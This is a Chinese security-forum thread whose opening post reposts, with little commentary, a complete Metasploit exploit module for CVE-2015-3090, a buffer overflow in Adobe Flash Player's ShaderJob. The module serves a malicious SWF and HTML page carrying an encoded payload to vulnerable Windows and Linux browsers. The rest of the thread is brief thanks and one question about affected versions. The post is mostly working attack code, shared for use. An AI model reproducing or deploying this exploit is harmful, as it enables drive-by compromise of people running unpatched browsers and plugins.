查看: 78316|回复: 338

Adobe Flash Player ShaderJob缓冲区溢出漏洞

[复制链接]
  • TA的每日心情

    2024-12-14 22:22
  • 签到天数: 1631 天

    [LV.Master]伴坛终老

    发表于 2015-6-20 09:47:28 | 显示全部楼层 |阅读模式
    CVE-2015-3090
    Description:
    This Metasploit module exploits a buffer overflow vulnerability related to the ShaderJob workings on Adobe Flash Player. The vulnerability happens when trying to apply a Shader setting up the same Bitmap object as src and destination of the ShaderJob. Modifying the "width" attribute of the ShaderJob after starting the job it's possible to create a buffer overflow condition where the size of the destination buffer and the length of the copy are controlled.

    [HTML] 纯文本查看 复制代码
    ##
    # This module requires Metasploit: [url]http://metasploit.com/download[/url]
    # Current source: [url]https://github.com/rapid7/metasploit-framework[/url]
    ##
     
    require 'msf/core'
     
    class Metasploit3 < Msf::Exploit::Remote
      Rank = GreatRanking
     
      include Msf::Exploit::Remote::BrowserExploitServer
     
      def initialize(info={})
        super(update_info(info,
          'Name'                => 'Adobe Flash Player ShaderJob Buffer Overflow',
          'Description'         => %q{
            This module exploits a buffer overflow vulnerability related to the ShaderJob workings on
            Adobe Flash Player. The vulnerability happens when trying to apply a Shader setting up the
            same Bitmap object as src and destination of the ShaderJob. Modifying the "width" attribute
            of the ShaderJob after starting the job it's possible to create a buffer overflow condition
            where the size of the destination buffer and the length of the copy are controlled. This
            module has been tested successfully on:
            * Windows 7 SP1 (32-bit), IE11 and Adobe Flash 17.0.0.169.
            * Windows 7 SP1 (32-bit), Firefox 38.0.5 and Adobe Flash 17.0.0.169.
            * Windows 8.1, Firefox 38.0.5 and Adobe Flash 17.0.0.169.
            * Linux Mint "Rebecca" (32 bits), Firefox 33.0 and Adobe Flash 11.2.202.457.
          },
          'License'             => MSF_LICENSE,
          'Author'              =>
            [
              'Chris Evans', # Vulnerability discovery
              'Unknown', # Exploit in the wild
              'juan vazquez' # msf module
            ],
          'References'          =>
            [
              ['CVE', '2015-3090'],
              ['URL', 'https://helpx.adobe.com/security/products/flash-player/apsb15-09.html'],
              ['URL', 'https://www.fireeye.com/blog/threat-research/2015/05/angler_ek_exploiting.html'],
              ['URL', 'http://malware.dontneedcoffee.com/2015/05/cve-2015-3090-flash-up-to-1700169-and.html'],
              ['URL', 'http://www.brooksandrus.com/blog/2009/03/11/bilinear-resampling-with-flash-player-and-pixel-bender/']
            ],
          'Payload'             =>
            {
              'DisableNops' => true
            },
          'Platform'            => ['win', 'linux'],
          'Arch'                => [ARCH_X86],
          'BrowserRequirements' =>
            {
              :source  => /script|headers/i,
              :arch    => ARCH_X86,
              :os_name => lambda do |os|
                os =~ OperatingSystems::Match::LINUX ||
                  os =~ OperatingSystems::Match::WINDOWS_7 ||
                  os =~ OperatingSystems::Match::WINDOWS_81
              end,
              :ua_name => lambda do |ua|
                case target.name
                when 'Windows'
                  return true if ua == Msf::HttpClients::IE || ua == Msf::HttpClients::FF
                when 'Linux'
                  return true if ua == Msf::HttpClients::FF
                end
     
                false
              end,
              :flash   => lambda do |ver|
                case target.name
                when 'Windows'
                  return true if ver =~ /^17\./ && Gem::Version.new(ver) <= Gem::Version.new('17.0.0.169')
                when 'Linux'
                  return true if ver =~ /^11\./ && Gem::Version.new(ver) <= Gem::Version.new('11.2.202.457')
                end
     
                false
              end
            },
          'Targets'             =>
            [
              [ 'Windows',
                {
                  'Platform' => 'win'
                }
              ],
              [ 'Linux',
                {
                  'Platform' => 'linux'
                }
              ]
            ],
          'Privileged'          => false,
          'DisclosureDate'      => 'May 12 2015',
          'DefaultTarget'       => 0))
      end
     
      def exploit
        @swf = create_swf
     
        super
      end
     
      def on_request_exploit(cli, request, target_info)
        print_status("Request: #{request.uri}")
     
        if request.uri =~ /\.swf$/
          print_status('Sending SWF...')
          send_response(cli, @swf, {'Content-Type'=>'application/x-shockwave-flash', 'Cache-Control' => 'no-cache, no-store', 'Pragma' => 'no-cache'})
          return
        end
     
        print_status('Sending HTML...')
        send_exploit_html(cli, exploit_template(cli, target_info), {'Pragma' => 'no-cache'})
      end
     
      def exploit_template(cli, target_info)
        swf_random = "#{rand_text_alpha(4 + rand(3))}.swf"
        target_payload = get_payload(cli, target_info)
        b64_payload = Rex::Text.encode_base64(target_payload)
        os_name = target_info[:os_name]
     
        if target.name =~ /Windows/
          platform_id = 'win'
        elsif target.name =~ /Linux/
          platform_id = 'linux'
        end
     
        html_template = %Q|<html>
        <body>
        <object classid="clsid:d27cdb6e-ae6d-11cf-96b8-444553540000" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab" width="1" height="1" />
        <param name="movie" value="<%=swf_random%>" />
        <param name="allowScriptAccess" value="always" />
        <param name="FlashVars" value="sh=<%=b64_payload%>&pl=<%=platform_id%>&os=<%=os_name%>" />
        <param name="Play" value="true" />
        <embed type="application/x-shockwave-flash" width="1" height="1" src="<%=swf_random%>" allowScriptAccess="always" FlashVars="sh=<%=b64_payload%>&pl=<%=platform_id%>&os=<%=os_name%>" Play="true"/>
        </object>
        </body>
        </html>
        |
     
        return html_template, binding()
      end
     
      def create_swf
        path = ::File.join(Msf::Config.data_directory, 'exploits', 'CVE-2015-3090', 'msf.swf')
        swf =  ::File.open(path, 'rb') { |f| swf = f.read }
     
        swf
      end
    end
    回复

    使用道具 举报

  • TA的每日心情
    慵懒
    2024-12-2 09:11
  • 签到天数: 919 天

    [LV.10]以坛为家III

    发表于 2015-6-20 10:35:23 来自手机 | 显示全部楼层
    看不懂。。
    回复 支持 反对

    使用道具 举报

  • TA的每日心情
    开心
    2017-3-24 14:50
  • 签到天数: 27 天

    [LV.4]偶尔看看III

    发表于 2015-6-20 11:14:15 | 显示全部楼层
    影响的版本有哪几个?
    回复 支持 反对

    使用道具 举报

  • TA的每日心情
    慵懒
    2019-4-14 17:44
  • 签到天数: 5 天

    [LV.2]偶尔看看I

    发表于 2015-6-27 04:40:20 | 显示全部楼层
    支持中国红客联盟(ihonker.org)
    回复 支持 反对

    使用道具 举报

    该用户从未签到

    发表于 2015-6-27 14:41:40 | 显示全部楼层
    加油!干倒冰儿和酒仙!
    回复 支持 反对

    使用道具 举报

    该用户从未签到

    发表于 2015-6-27 15:42:50 | 显示全部楼层
    感谢楼主的分享~
    回复 支持 反对

    使用道具 举报

    该用户从未签到

    发表于 2015-6-27 20:33:56 | 显示全部楼层
    回复 支持 反对

    使用道具 举报

  • TA的每日心情
    郁闷
    2016-4-13 21:38
  • 签到天数: 1 天

    [LV.1]初来乍到

    发表于 2015-6-27 23:47:06 | 显示全部楼层
    感谢楼主的分享~
    回复 支持 反对

    使用道具 举报

    该用户从未签到

    发表于 2015-6-28 15:10:27 | 显示全部楼层
    支持,看起来不错呢!
    回复 支持 反对

    使用道具 举报

  • TA的每日心情
    开心
    2022-10-21 10:32
  • 签到天数: 11 天

    [LV.3]偶尔看看II

    发表于 2015-6-28 21:39:36 | 显示全部楼层
    回复 支持 反对

    使用道具 举报

    您需要登录后才可以回帖 登录 | 注册

    本版积分规则

    指导单位

    江苏省公安厅

    江苏省通信管理局

    浙江省台州刑侦支队

    DEFCON GROUP 86025

    旗下站点

    邮箱系统

    应急响应中心

    红盟安全

    联系我们

    官方QQ群:112851260

    官方邮箱:security#ihonker.org(#改成@)

    官方核心成员

    Archiver|手机版|小黑屋| ( 苏ICP备2021031567号 )

    GMT+8, 2024-12-22 23:31 , Processed in 0.032485 second(s), 15 queries , Gzip On, MemCache On.

    Powered by ihonker.com

    Copyright © 2015-现在.

  • 返回顶部